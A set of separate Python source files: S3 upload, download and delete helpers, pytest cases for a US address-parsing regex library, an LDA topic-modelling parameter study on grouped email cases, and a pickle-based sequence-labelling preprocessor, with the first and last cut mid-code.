to_delete = [r["VersionId"] for r in response if r["Key"] == filename]
except Exception as e:
print(str(e))
continue
results.extend(to_delete)
return results
def delete_file_s3(key, filename):
# flag = True
# for version in get_all_versions(PBOX_BUCKET, filename):
# try:
# resp = client.delete_object(Bucket=PBOX_BUCKET, Key=filename, VersionId=version)
# print(resp)
# except Exception as e:
# print("Error while deleting from S3:", str(e))
# flag = False
# resp = client.delete_object(
# Bucket=PBOX_BUCKET,
# Key=key
# )
resp = s3_obj.Object(PBOX_BUCKET, key).delete()
print(resp)
return resp
def download_file(key, filename):
obj = s3_obj.Object(PBOX_BUCKET, key)
resp = obj.get()
print(resp)
if resp and ("HTTPHeaders" in resp["ResponseMetadata"]):
headers = {
"content-disposition": "attachment;filename=" + filename,
"content-type": resp["ResponseMetadata"]['HTTPHeaders']['content-type'] ,
"content-length": resp["ResponseMetadata"]['HTTPHeaders']['content-length']
}
return resp['Body'].read(), headers
return None, None
# with open('hello.md', 'wb') as data:
# s3_bucket.download_fileobj('hello.md', data)
# print(data)
# resp = s3_bucket.download_file(key, filename)
# data = open(filename, mode="rb")
# return data
def list_all_data(user):
print(PBOX_BUCKET)
prefix = "/" + PBOX_BUCKET + "/" + user
response = client.list_objects_v2(Bucket=PBOX_BUCKET) #, Prefix=prefix)
if 'Contents' in response:
for item in response['Contents']:
print(item)
# print('deleting file', item['Key'])
# client.delete_object(Bucket=PBOX_BUCKET, Key=item['Key'])
# while response['KeyCount'] == 1000:
# response = client.list_objects_v2(
# Bucket=PBOX_BUCKET,
# StartAfter=response['Contents'][0]['Key'],
# )
# for item in response['Contents']:
# print('deleting file', item['Key'])
# client.delete_object(Bucket=PBOX_BUCKET, Key=item['Key'])
def save_to_s3(data, username, filename, description):
#In order to generate a file, you must put "/" at the end of key
# stamp = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
filepath = f"{username}/{filename}"
print(filepath)
try:
start = time.time()
resp = client.put_object(Bucket=PBOX_BUCKET, Body=data, Key=filepath)
end = time.time()
body = {
"username": username,
"firstname": username,
"lastname": username,
"uploadTime": str(end - start),
"description": description,
"filekey": "pbox-storage/" + username + "/" + filename
}
db.insert(body)
return resp, True
except Exception as e:
print(f"S3 upload error: {str(e)}")
return str(e), False
# def s3_delete_all_file(folder):
# bucket = s3.Bucket('aniketbucketpython')
# d = f"{folder}/"
# for obj in bucket.objects.filter(Prefix=f):
# s3.Object(bucket.name,obj.key).delete()
def get_objects_in_folder(folderpath):
"""List all objects in the provided directory.
1. Set bucket name.
2. Leave delimiter blank to fetch all files.
3. Set folder path to "folderpath" parameter.
4. Return list of objects in folder.
"""
objects = client.list_objects_v2(
Bucket='hackers',
EncodingType='url',
MaxKeys=1000,
Prefix=folderpath,
ContinuationToken='',
FetchOwner=False,
StartAfter=''
)
return objects
|
# -*- coding: utf-8 -*-
""" Test for USA address parser """
import re
import pytest
from pyap import utils
from pyap.packages import six
import pyap.source_US.data as data_us
def execute_matching_test(input, expected, pattern):
match = utils.match(pattern, input, re.VERBOSE)
is_found = match is not None
if expected:
assert is_found == expected and match.group(0) == input
else:
"""we check that:
- input should not to match our regex
- our match should be partial if regex matches some part of string
"""
assert (is_found == expected) or (match.group(0) != input)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("ZERO ", True),
("one ", True),
("two ", True),
("Three ", True),
("FoUr ", True),
("FivE ", True),
("six ", True),
("SEvEn ", True),
("Eight ", True),
("Nine ", True),
# negative assertions
("Nidnes", False),
("One", False),
("two", False),
("onetwothree ", False),
])
def test_zero_to_nine(input, expected):
''' test string match for zero_to_nine '''
execute_matching_test(input, expected, data_us.zero_to_nine)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("tEN ", True),
("TWENTY ", True),
("tHirtY ", True),
("FOUrty ", True),
("fifty ", True),
("sixty ", True),
("seventy ", True),
("eighty ", True),
("NINety ", True),
# negative assertions
("ten", False),
("twenTY", False),
("sixtysixsty ", False),
("one twenty ", False),
])
def test_ten_to_ninety(input, expected):
''' test string match for ten_to_ninety '''
execute_matching_test(input, expected, data_us.ten_to_ninety)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("Hundred ", True),
("HuNdred ", True),
# negative assertions
("HuNDdred", False),
("HuNDdred hundred ", False),
])
def test_hundred(input, expected):
''' tests string match for a hundred '''
execute_matching_test(input, expected, data_us.hundred)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("Thousand ", True),
("thOUSAnd ", True),
# negative assertions
("thousand", False),
("THoussand ", False),
("THoussand", False),
("THOUssand THoussand ", False),
])
def test_thousand(input, expected):
''' tests string match for a thousand '''
execute_matching_test(input, expected, data_us.thousand)
@pytest.mark.parametrize("input,expected", [
# positive assertions (words)
("One Thousand And Fifty Nine ", True),
("Two hundred and fifty ", True),
("Three hundred four ", True),
("Thirty seven ", True),
("FIFTY One ", True),
("Three hundred Ten ", True),
# positive assertions (numbers)
("1 ", True),
("15 ", True),
("44 ", True),
("256 ", True),
("256 ", True),
("1256 ", True),
("32457 ", True),
# negative assertions (words)
("ONE THousszz22and FIFTY and four onde", False),
("ONE one oNe and onE Three", False),
# negative assertions (numbers)
("536233", False),
("111111", False),
("1111ss11", False),
("123 456", False),
])
def test_street_number(input, expected):
''' tests string match for a street number '''
execute_matching_test(input, expected, data_us.street_number)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("Northeast Kentucky Industrial ", True),
("One ", True),
("First ", True),
("Ave 123 ", True),
("Northeast 5 ", True),
# negative assertions
("Northeast Kentucky Industrial Maple ", False),
("a", False),
("ab", False),
])
def test_street_name(input, expected):
''' tests positive string match for a street name '''
execute_matching_test(input, expected, data_us.street_name)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("N. ", True),
("N ", True),
("S ", True),
("West ", True),
("eASt ", True),
("NW ", True),
("SE ", True),
# negative assertions
("NW.", False),
("NW. ", False),
("NS ", False),
("EW ", False),
])
def test_post_direction(input, expected):
''' tests string match for a post_direction '''
execute_matching_test(input, expected, data_us.post_direction)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("Street ", True),
("St. ", True),
("St.", True),
("Blvd.", True),
("Blvd. ", True),
("LN ", True),
("RD", True),
("Cir", True),
("Highway ", True),
("Hwy ", True),
("Ct", True),
("Sq.", True),
("LP. ", True),
("LP. (Route A1 )", True),
("Street route 5 ", True),
("blvd", True),
("Estate", True),
("Manor", True),
# negative assertions
# TODO
])
def test_street_type(input, expected):
''' tests string match for a street id '''
execute_matching_test(input, expected, data_us.street_type)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("floor 3 ", True),
("floor 11 ", True),
("floor 15 ", True),
("1st floor ", True),
("2nd floor ", True),
("15th floor ", True),
("16th. floor ", True),
# negative assertions
("16th.floor ", False),
("1stfloor ", False),
])
def test_floor(input, expected):
''' tests string match for a floor '''
execute_matching_test(input, expected, data_us.floor)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("bldg m ", True),
("Building F ", True),
("bldg 2 ", True),
("building 3 ", True),
("building 100 ", True),
("building 1000 ", True),
("Building ", True),
("building one ", True),
("Building three ", True),
# negative assertions
("bldg", False),
("bldgm", False),
("bldg100 ", False),
("building 10000 ", False),
])
def test_building(input, expected):
''' tests string match for a building '''
execute_matching_test(input, expected, data_us.building)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("suite 900 ", True),
("Suite #2 ", True),
("suite #218 ", True),
("suite J7 ", True),
("suite 102A ", True),
("suite a&b ", True),
("Suite J#200 ", True),
("suite 710-327 ", True),
("Suite A ", True),
("ste A ", True),
("Ste 101 ", True),
("ste 502b ", True),
("ste 14-15 ", True),
("ste E ", True),
("ste 9E ", True),
("Suite 1800 ", True),
("Apt 1B ", True),
("Rm. 52 ", True),
("#2b ", True),
# positive assertions
("suite900 ", False),
("Suite#2", False),
("suite218 ", False),
])
def test_occupancy(input, expected):
''' tests string match for a place id '''
execute_matching_test(input, expected, data_us.occupancy)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("po box 108", True),
("Po Box 53485", True),
("P.O. box 119", True),
("PO box 1070", True),
# negative assertions
("po box108 ", False),
("PoBox53485 ", False),
("P.O. box119", False),
("POb ox1070 ", False),
])
def test_po_box_positive(input, expected):
''' tests exact string match for a po box '''
execute_matching_test(input, expected, data_us.po_box)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("9652 Lo<NAME>", True),
("101 <NAME>", True),
("1 West Hegeler Lane", True),
("1270 Leeds Avenue", True),
("85-1190 Ranchview Rd. NW ", True),
("62 Portland Road (Route 1)", True),
("200 N. Pine Avenue Suite 514", True),
("200 S. Alloy Drive", True),
("Two Hundred S. Alloy Drive", True),
("Two Hundred South Alloy Drive", True),
("Two Hundred South Alloy Dr.", True),
("11001 Fondren Rd,", True),
("9606 North Mopac Expressway Suite 500", True),
("9692 East Arapahoe Road,", True),
("9 Grand Avenue, Suite 2", True),
("9 Grand Avenue Building 2, Suite 2", True),
("9 Grand Avenue Building 2, Suite 2A", True),
("233 Richmond Highway Suite 1800", True),
("354 Eisenhower Parkway P.O. Box 472", True),
("6645 N Ensign St", True),
("1200 Old Fairhaven Pkwy Apt 106", True),
("1659 Scott Blvd Ste 26", True),
("377 Fisher Rd Ste C", True),
("1833 Stearman Ave", True),
("1737 S Lumpkin St Ste B", True),
("101 N Court Sq Ste 16", True),
("1790 Y<NAME> Rd, Suite #205", True),
("280 West Main Street", True),
("701 Tennessee Walk", True),
("7457 Harwin Dr", True),
("700 Davis Avenue", True),
("1 W 47th St", True),
("832 Seward St", True),
("2740 Timber Ridge Lane", True),
("810 E Western Ave", True),
("6223 Richmond Ave Ste 105", True),
("400 Middle Street", True),
("81 N Main St", True),
("3705 West Memorial Road", True),
("4911 Matterhorn Dr", True),
("5830 Yahl Street, #2b", True),
("9400 Doliver Dr Apt 13", True),
("10701 Stirling Road", True),
("1865 Corporate Dr Ste 225", True),
("80 Beaman Rd", True),
("9691 Spratley Ave", True),
("10835 New Haven Rd NW ", True),
("320 W Broussard Rd", True),
("9001 Any Old Way", True),
("8967 Market St.", True),
("3724 Oxford Blvd.", True),
("901 Rainier Ave S ", True),
])
def test_full_street_positive(input, expected):
''' tests exact string match for a full street '''
execute_matching_test(input, expected, data_us.full_street)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("0 OLD MILL RD, Maynard, MA 01754", True),
("103 Morgan Lane, Suite 102 Plainsboro, NJ 08536", True),
("3409 16th St Metairie, LA 70002", True),
("1505 NW 14th Street Miami, FL 33125", True),
("01 Main Rd. Newfield, NJ", True),
("28 Gorgo Lane Newfield, NJ", True),
("1720 HARDING HWY NEWFIELD, NJ", True),
("4409 N DELSEA DR NEWFIELD, NJ", True),
("742 FORSYTHIA DR NEWFIELD, NJ", True),
("9 N EAST BLVD NEWFIELD, NJ 10000", True),
("1640 Harding Hwy Newfield, NJ", True),
("1720 Harding Highway NEWFIELD, NJ", True),
("1014 CATAWBA AVE NEWFIELD, NJ", True),
("11 ARCH AVE NEWFIELD, NJ", True),
("133 TAYLOR RD NEWFIELD, NJ", True),
("4409 N Delsea Drive Newfield, NJ", True),
("8 TAYLOR RD NEWFIELD, NJ", True),
("28 GORGO LN NEWFIELD, NJ", True),
("900 COLUMBIA AVE. NEWFIELD, NJ", True),
("3201 MAIN RD NEWFIELD, NJ", True),
("4421 N DELSEA DR NEWFIELD, NJ", True),
("742 Forsythia Drive Newfield, NJ", True),
("1450 E. Chestnut Avenue, Vineland NJ,", True),
("50 Harry S Truman Parkway Annapolis, MD 21401", True),
("420 Crompton Street Charlotte , North Carolina 28273", True),
("204 East 3rd Ave Cheyenne, WY 82001", True),
("1806 Dominion Way Ste B Colorado Spgs, CO 80918-8409", True),
("2600 South Shore Blvd Ste. 300 League City, TX 77573", True),
("2675 Antler Drive Carson City, NV 89701-1451", True),
("3719 Lockwood Dr., Houston, TX 77026", True),
("154 Grand Street New York, NY 10013", True),
("3655 Torrance Blvd Suite 230 Torrance CA 90503", True),
("800 Sixth Ave #31A New York, NY 10001", True),
("8861 Research Drive, Ste. 200, Irvine, CA 92618", True),
("317 N. Mission St. Ste. 200 Wenatchee, WA 98801", True),
("2709 Bickford Avenue, Suite A Snohomish, WA 98290", True),
("7307 N. Division Street, Suite 102 Spokane, WA 99208", True),
("1530 South Union Avenue, Suite 7 Tacoma, WA 98405", True),
("3131 Smokey Point Drive, Suite 14 A Arlington, WA 98223", True),
("1603 Grove Street Marysville, WA 98270", True),
("15701 E. Sprague Avenue, Suite F Spokane Valley, WA 99037", True),
("18204 Bothell Everett Hwy, Suite E Bothell, WA 98012", True),
("3505 188th Street SW Lynnwood, WA 98037", True),
("3218 NE 12th Street, Suite B Renton, WA 98056", True),
("22035 SE Wax Road, Suite 5 Maple Valley, WA 98038", True),
("8861 Research Drive, Ste. 200 Irvine, CA 92618", True),
("4031 University Drive Suite 200 Fairfax, Virginia 22030", True),
("586 W. 207 St. New York, NY 10034", True),
("85 Newbury St, Boston, MA 02116", True),
("1827 Union St, San Francisco, CA 94123", True),
("1636 Main St Sarasota, FL 34236", True),
("1015 South Western Avenue, Chicago, IL 60649", True),
("510 W 7th St. Los Angeles, CA 90014", True),
("225 North Larchmont Blvd Los Angeles, CA 90004", True),
("3760 E. Tremont Ave. Throgsneck, NY 10465", True),
("8126 S. Stony Island Ave Chicago, IL 60617", True),
("68116 HEM 908 B WEST 12th St. Austin, TX 78703", True),
("546 West Colorado Street Glendale CA 91204", True),
("2210 N Halsted St, Chicago, IL 60614", True),
("4090 Westown Pkwy Ste B2 Chicago, IL 60614", True),
("7000 Peachtree Dunwoody Rd NE Bldg 7, Miami, FL, USA", True),
("98-025 Hekaha St Ste 221A, Cityville, Arizona", True),
("225 <NAME>, Suite 1500 Irving, Texas 75062 U.S.A.", True),
("643 Lincoln Rd. Miami Beach, FL 33139", True),
("300 Market St. Harrisburg, PA 17101", True),
("2 Kings Hwy Shreveport, LA 71104", True),
("1500 Westlake Avenue North Suite 108 Seattle, WA 98109", True),
("840 Garrison Brooks Suite 985, New Sarah, OH 38255", True),
("840 Garrison Brooks Suite 985 New Sarah, OH 38255", True),
# negative assertions
("85 STEEL REGULAR SHAFT - NE", False),
("3 STRUCTURE WITH PE", False),
("2013 Courtesy of <NAME>, PR", False),
("44 sq. ft. 000 Columbia Ave. See Remarks, Newfield, NJ 08344", False),
("7901 SILVER CONDUCTIVE HOLE FILL MA", False),
("3 THIRD PARTY LIST IN", False),
("9 STORAGE OF INDIVIDUAL IN", False),
("4 BODY WAVE MODEL MO", False),
("4060 AUTOMATIC STRAPPING MACHINE KZB-II STRAPPING MA", False),
("130 AUTOMATIC STRAPPING MACHINE CO", False),
("6060 AUTOMATIC STRAPPING MACHINE SK", False),
("500 AUTO BLISTER PACKING SEALING MA", False),
("23 ELECTRICAL COLOURED-TAPE PR", False),
("1900 TRANSISTOR ELECTROMAGNETIC INDUCTION AL", False),
("3131 DR. MATTHEW WI", False),
("ONE FOR ANY DIRECT, INDIRECT, IN", False),
("2 TRACTOR HEAD Actros MP", False),
("00 Straight Fit Jean, USA", False),
])
def test_full_address(input, expected):
''' tests exact string match for a full address '''
execute_matching_test(input, expected, data_us.full_address)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("75062", True),
("15032", True),
("95130-6482", True),
# negative assertions
("1", False),
("23", False),
("456", False),
("4567", False),
("750621", False),
("95130-642", False),
("95130-64212", False),
])
def test_postal_code(input, expected):
''' test exact string match for postal code '''
execute_matching_test(input, expected, data_us.postal_code)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("Montana", True),
("Nebraska", True),
("NJ", True),
("DC", True),
("PuErTO RIco", True),
("oregon", True),
])
def test_region1(input, expected):
''' test exact string match for province '''
execute_matching_test(input, expected, data_us.region1)
@pytest.mark.parametrize("input,expected", [
# positive assertions
("USA", True),
("U.S.A", True),
("United States", True),
])
def test_country(input, expected):
''' test exact string match for country '''
execute_matching_test(input, expected, data_us.country)
|
# Various preprocessing techniques and n_topics for LDA to optimize Similarity score
# Author: <NAME>
# Last edited: 2022-02-21
#
#%%
import os, sys, re
from nltk.chunk import ne_chunk
import pandas as pd
import numpy as np
from os import path
from argparse import ArgumentParser
from stages.utils.utils import parseArgs, DataCleaner
from stages.TM.textmining import Message, Case, CasesList, lemmatize, gen_words
#%%
# Import, preprocessing, case clustering
infile = path.join("resources", "dataset", "Mail_ApplicationDataset_-2.csv")
# import NLD file
inputFile = pd.read_csv(infile, delimiter=";")
cleaner = DataCleaner(
removeURLs=True,
removeMultWhitespace=True,
lowercasing=False,
dateFormat="%Y-%m-%d %H:%M:%S"
)
cleaner.apply(inputFile)
casesList = CasesList.groupCases(file=inputFile, maxDays=14)
#casesList.prettyprint()
#%%
# Text mining
# 1. step: Preprocesing
import nltk
nltk.download("stopwords")
from nltk.corpus import stopwords
# gensim
import gensim
import gensim.corpora
from gensim.utils import pickle, simple_preprocess
from gensim.models import CoherenceModel
# spacy
import spacy
# vis
import pyLDAvis
import pyLDAvis.gensim_models as gensimvis
stopwords = stopwords.words("english")
corpora_msg = casesList.getCorpora()
len(corpora_msg)
#%%
corpora_lemmatized = lemmatize(corpora_msg)
corpora_prep = gen_words(corpora_lemmatized)
#%%
# 2. step: build up clusters using LDA and visualize them
# identify bigrams and trigrams
bigrams_phrases = gensim.models.Phrases(
corpora_prep,
min_count=5,
threshold=20
)
trigram_phrases = gensim.models.Phrases(
bigrams_phrases[corpora_prep],
threshold=20
)
bigram = gensim.models.phrases.Phraser(bigrams_phrases)
trigram = gensim.models.phrases.Phraser(trigram_phrases)
def make_bigrams(texts):
return([bigram[doc] for doc in texts])
def make_trigrams(texts):
return ([trigram[bigram[doc]] for doc in texts])
data_bigrams = make_bigrams(corpora_prep)
data_bigrams_trigrams = make_trigrams(data_bigrams)
# Train with dataset
id2word = gensim.corpora.Dictionary(data_bigrams_trigrams)
corp = [id2word.doc2bow(text) for text in data_bigrams_trigrams]
#%% TF IDF removal - better not!
id2word = gensim.corpora.Dictionary(corpora_prep)
corp = [id2word.doc2bow(text) for text in corpora_prep]
from gensim.models import TfidfModel
tfidf = TfidfModel(corp, id2word=id2word)
low_value = 0.02 # threshold
words = []
words_missing_in_tfidf = []
for i in range(0,len(corp)):
bow = corp[i]
low_value_words = []
tfidf_ids = [id for id,value in tfidf[bow]]
bow_ids = [id for id,value in bow]
low_value_words = [id for id,value in tfidf[bow] if value < low_value]
drops = low_value_words+words_missing_in_tfidf
for item in drops:
words.append(id2word[item])
words_missing_in_tfidf = [id for id in bow_ids if id not in tfidf_ids] # words with tfidf score == 0
new_bow = [b for b in bow if b[0] not in low_value_words and b[0] not in words_missing_in_tfidf]
corp[i] = new_bow
#%%
#%% LDA Model
id2word = gensim.corpora.Dictionary(corpora_prep)
corp = [id2word.doc2bow(text) for text in corpora_prep]
#%%
# Hyperparameter Optimization
# Start of optimization operation
num_pool = list(range(5,31))
pool_scores = []
for pool in num_pool:
lda_model = gensim.models.ldamodel.LdaModel(
corpus=corp, # corp
id2word=id2word,
num_topics=pool,
random_state=100,
update_every=1,
chunksize=100,
passes=10,
alpha="auto"
)
# pyLDAvis.enable_notebook()
# vis = gensimvis.prepare(
# lda_model,
# corp,
# id2word,
# mds="mmds",
# R=20)
# assign detected labels to every message
for case in casesList:
for message in case.messages:
cor = message.subject + " " + message.content
new_text_corpus = id2word.doc2bow(cor.split())
highestPercentageLabel = max(lda_model[new_text_corpus], key=lambda x:x[1])[0]
if (message.from_.split("@")[1] == message.to.split("@")[1]):
message.detectedLabel = 3
else:
message.detectedLabel = highestPercentageLabel
# get all train labels
labels = casesList.getTrainLabels()
# get amount of similar classifications for each label
quotas = []
print(f"Stats for n_topics={pool}:")
print("---------------------------")
for label in labels:
# get all messages with label and check similar
msg = casesList.getMessagesByLabel(label)
detectedLabels = [m.detectedLabel for m in msg]
try:
max_ocurr = (max(sorted(set([i for i in detectedLabels if detectedLabels.count(i)>2]))))
except:
max_occur = 0
num = detectedLabels.count(max_ocurr)
rest = len(detectedLabels)-num
quota = num/(rest+num)
print(f"Correctly identified messages for label {label}: {num}/{num+rest}={quota}")
quotas.append([quota, len(detectedLabels)])
label_elcounts = [x[1] for x in quotas]
labelscores = [x[0] for x in quotas]
weighted = [a*b for a,b in zip(label_elcounts, labelscores)]
overall = sum(weighted)/sum(label_elcounts)
print(f"Overall result: {overall}")
pool_scores.append((pool, overall, quotas))
#%%
# Save Parameter Study values for later plotting (change filename accordingly)
import pickle
filename = "lemma_simple_tfidf3.pkl"
p = path.join("out", "parameter_study")
with open(path.join(p, filename), "wb") as f:
pickle.dump(pool_scores, f) |
import _pickle
import os
import numpy as np
DEFAULT_PADDING_LABEL = '<pad>' # dict index = 0
DEFAULT_UNKNOWN_LABEL = '<unk>' # dict index = 1
DEFAULT_RESERVED_LABEL = ['<reserved-2>',
'<reserved-3>',
'<reserved-4>'] # dict index = 2~4
DEFAULT_WORD_TO_INDEX = {DEFAULT_PADDING_LABEL: 0, DEFAULT_UNKNOWN_LABEL: 1,
DEFAULT_RESERVED_LABEL[0]: 2, DEFAULT_RESERVED_LABEL[1]: 3,
DEFAULT_RESERVED_LABEL[2]: 4}
# the first vocab in dict with the index = 5
def save_pickle(obj, pickle_path, file_name):
"""Save an object into a pickle file.
:param obj: an object
:param pickle_path: str, the directory where the pickle file is to be saved
:param file_name: str, the name of the pickle file. In general, it should be ended by "pkl".
"""
with open(os.path.join(pickle_path, file_name), "wb") as f:
_pickle.dump(obj, f)
print("{} saved in {}".format(file_name, pickle_path))
def load_pickle(pickle_path, file_name):
"""Load an object from a given pickle file.
:param pickle_path: str, the directory where the pickle file is.
:param file_name: str, the name of the pickle file.
:return obj: an object stored in the pickle
"""
with open(os.path.join(pickle_path, file_name), "rb") as f:
obj = _pickle.load(f)
print("{} loaded from {}".format(file_name, pickle_path))
return obj
def pickle_exist(pickle_path, pickle_name):
"""Check if a given pickle file exists in the directory.
:param pickle_path: the directory of target pickle file
:param pickle_name: the filename of target pickle file
:return: True if file exists else False
"""
if not os.path.exists(pickle_path):
os.makedirs(pickle_path)
file_name = os.path.join(pickle_path, pickle_name)
if os.path.exists(file_name):
return True
else:
return False
class BasePreprocess(object):
"""Base class of all preprocessors.
Preprocessors are responsible for converting data of strings into data of indices.
During the pre-processing, the following pickle files will be built:
- "word2id.pkl", a mapping from words(tokens) to indices
- "id2word.pkl", a reversed dictionary
- "label2id.pkl", a dictionary on labels
- "id2label.pkl", a reversed dictionary on labels
These four pickle files are expected to be saved in the given pickle directory once they are constructed.
Preprocessors will check if those files are already in the directory and will reuse them in future calls.
"""
def __init__(self):
self.word2index = None
self.label2index = None
@property
def vocab_size(self):
return len(self.word2index)
@property
def num_classes(self):
return len(self.label2index)
def run(self, train_dev_data, test_data=None, pickle_path="./", train_dev_split=0, cross_val=False, n_fold=10):
"""Main preprocessing pipeline.
:param train_dev_data: three-level list, with either single label or multiple labels in a sample.
:param test_data: three-level list, with either single label or multiple labels in a sample. (optional)
:param pickle_path: str, the path to save the pickle files.
:param train_dev_split: float, between [0, 1]. The ratio of training data used as validation set.
:param cross_val: bool, whether to do cross validation.
:param n_fold: int, the number of folds of cross validation. Only useful when cross_val is True.
:return results: a tuple of datasets after preprocessing.
"""
if pickle_exist(pickle_path, "word2id.pkl") and pickle_exist(pickle_path, "class2id.pkl"):
self.word2index = load_pickle(pickle_path, "word2id.pkl")
self.label2index = load_pickle(pickle_path, "class2id.pkl")
else:
self.word2index, self.label2index = self.build_dict(train_dev_data)
save_pickle(self.word2index, pickle_path, "word2id.pkl")
save_pickle(self.label2index, pickle_path, "class2id.pkl")
if not pickle_exist(pickle_path, "id2word.pkl"):
index2word = self.build_reverse_dict(self.word2index)
save_pickle(index2word, pickle_path, "id2word.pkl")
if not pickle_exist(pickle_path, "id2class.pkl"):
index2label = self.build_reverse_dict(self.label2index)
save_pickle(index2label, pickle_path, "id2class.pkl")
data_train = []
data_dev = []
if not cross_val:
if not pickle_exist(pickle_path, "data_train.pkl"):
data_train.extend(self.to_index(train_dev_data))
if train_dev_split > 0 and not pickle_exist(pickle_path, "data_dev.pkl"):
split = int(len(data_train) * train_dev_split)
data_dev = data_train[: split]
data_train = data_train[split:]
save_pickle(data_dev, pickle_path, "data_dev.pkl")
print("{} of the training data is split for validation. ".format(train_dev_split))
save_pickle(data_train, pickle_path, "data_train.pkl")
else:
data_train = load_pickle(pickle_path, "data_train.pkl")
if pickle_exist(pickle_path, "data_dev.pkl"):
data_dev = load_pickle(pickle_path, "data_dev.pkl")
else:
# cross_val is True
if not pickle_exist(pickle_path, "data_train_0.pkl"):
# cross validation
data_idx = self.to_index(train_dev_data)
data_cv = self.cv_split(data_idx, n_fold)
for i, (data_train_cv, data_dev_cv) in enumerate(data_cv):
save_pickle(
data_train_cv, pickle_path,
"data_train_{}.pkl".format(i))
save_pickle(
data_dev_cv, pickle_path,
"data_dev_{}.pkl".format(i))
data_train.append(data_train_cv)
data_dev.append(data_dev_cv)
print("{}-fold cross validation.".format(n_fold))
else:
for i in range(n_fold):
data_train_cv = load_pickle(pickle_path, "data_train_{}.pkl".format(i))
data_dev_cv = load_pickle(pickle_path, "data_dev_{}.pkl".format(i))
data_train.append(data_train_cv)
data_dev.append(data_dev_cv)
# prepare test data if provided
data_test = []
if test_data is not None:
if not pickle_exist(pickle_path, "data_test.pkl"):
data_test = self.to_index(test_data)
save_pickle(data_test, pickle_path, "data_test.pkl")
# return preprocessed results
results = [data_train]
if cross_val or train_dev_split > 0:
results.append(data_dev)
if test_data:
results.append(data_test)
if len(results) == 1:
return results[0]
else:
return tuple(results)
def build_dict(self, data):
raise NotImplementedError
def to_index(self, data):
raise NotImplementedError
def build_reverse_dict(self, word_dict):
id2word = {word_dict[w]: w for w in word_dict}
return id2word
def data_split(self, data, train_dev_split):
"""Split data into train and dev set."""
split = int(len(data) * train_dev_split)
data_dev = data[: split]
data_train = data[split:]
return data_train, data_dev
def cv_split(self, data, n_fold):
"""Split data for cross validation."""
data_copy = data.copy()
np.random.shuffle(data_copy)
fold_size = round(len(data_copy) / n_fold)
data_cv = []
for i in range(n_fold - 1):
start = i * fold_size
end = (i + 1) * fold_size
data_dev = data_copy[start:end]
data_train = data_copy[:start] + data_copy[end:]
data_cv.append((data_train, data_dev))
start = (n_fold - 1) * fold_size
data_dev = data_copy[start:]
data_train = data_copy[:start]
data_cv.append((data_train, data_dev))
return data_cv
class SeqLabelPreprocess(BasePreprocess):
"""Preprocess pipeline, including building mapping from words to index, from index to words,
from labels/classes to index, from index to labels/classes.
data of three-level list which have multiple labels in each sample.
::
[
[ [word_11, word_12, ...], [label_1, label_1, ...] ],
[ [word_21, word_22, ...], [label_2, label_1, ...] ],
...
]
"""
def __init__(self):
super(SeqLabelPreprocess, self).__init__()
def build_dict(self, data):
"""Add new words with indices into self.word_dict, new labels with indices into self.label_dict.
:param data: three-level list
::
[
[ [word_11, word_12, ...], [label_1, label_1, ...] ],
[ [word_21, word_22, ...], [label_2, label_1, ...] ],
...
]
:return word2index: dict of {str, int}
label2index: dict of {str, int}
"""
# In seq labeling, both word seq and label seq need to be padded to the same length in a mini-batch.
label2index = DEFAULT_WORD_TO_INDEX.copy()
word2index = DEFAULT_WORD_TO_INDEX.copy()
for example in data:
for word, label in zip(example[0], example[1]):
if word not in word2index:
word2index[word] = len(word2index)
if label not in label2index:
label2index[label] = len(label2index)
return word2index, label2index
def to_index(self, data):
"""Convert word strings and label strings into indices.
:param data: three-level list
::
[
[ [word_11, word_12, ...], [label_1, label_1, ...] ],
[ [word_21, word_22, ...], [label_2, label_1, ...] ],
...
]
:return data_index: the same shape as data, but each string is replaced by its corresponding index
"""
data_index = []
for example in data:
word_list = []
label_list = []
for word, label in zip(example[0], example[1]):
word_list.append(self.word2index.get(word, DEFAULT_WORD_TO_INDEX[DEFAULT_UNKNOWN_LABEL]))
label_list.append(self.label2index.get(label, DEFAULT_WORD_TO_INDEX[DEFAULT_UNKNOWN_LABEL]))
data_index.append([word_list, label_list])
return data_index
class MultiFeaSeqpreprocess(BasePreprocess):
def __init__(self):
super(MultiFeaSeqpreprocess,self).__init__()
def build_dict(self, data):
if not isinstance(data,list):
raise RuntimeError("the type of data is wrong")
sample=data[0]
dict_={}
for i,fea in enumerate(sample):
if isinstance(fea, list):
if i==0:
dict_["sent"]={'<pad>':0,"<unk>":1}
else:
dict_["fea_"+str(i)]={}
fea_num = len(dict_)
for example in data:
for fea in zip(*example[:fea_num]):
for i,dic_name in enumerate(dict_):
if fea[i] not in dict_[dic_name]:
dict_[dic_name][fea[i]]=len(dict_[dic_name])
return dict_
def run(self, train_dev_data, test_data=None, pickle_path="./", train_dev_split=0, cross_val=False, n_fold=10):
if pickle_exist(pickle_path, "all_dicts.pkl"):
self.all_dicts = load_pickle(pickle_path, "all_dicts.pkl")
else:
self.all_dicts = self.build_dict(train_dev_data)
save_pickle(self.all_dicts, pickle_path, "all_dicts.pkl")
if not pickle_exist(pickle_path, "rev_dicts.pkl"):
rev_dicts = self.build_reverse_dict(self.all_dicts)
save_pickle(rev_dicts, pickle_path, "rev_dicts.pkl")
data_train = []
data_dev = []
if pickle_exist(pickle_path, "data_train.pkl") and pickle_exist(pickle_path, "data_dev.pkl"):
data_train = load_pickle(pickle_path, "data_train.pkl")
data_dev = load_pickle(pickle_path, "data_dev.pkl")
else:
data_train.extend(self.to_index(train_dev_data))
if train_dev_split > 0 and not pickle_exist(pickle_path, "data_dev.pkl"):
split = int(len(data_train) * train_dev_split)
data_dev = data_train[: split]
data_train = data_train[split:]
save_pickle(data_dev, pickle_path, "data_dev.pkl")
print("{} of the training data is split for validation. ".format(train_dev_split))
save_pickle(data_train, pickle_path, "data_train.pkl")
results = [data_train]
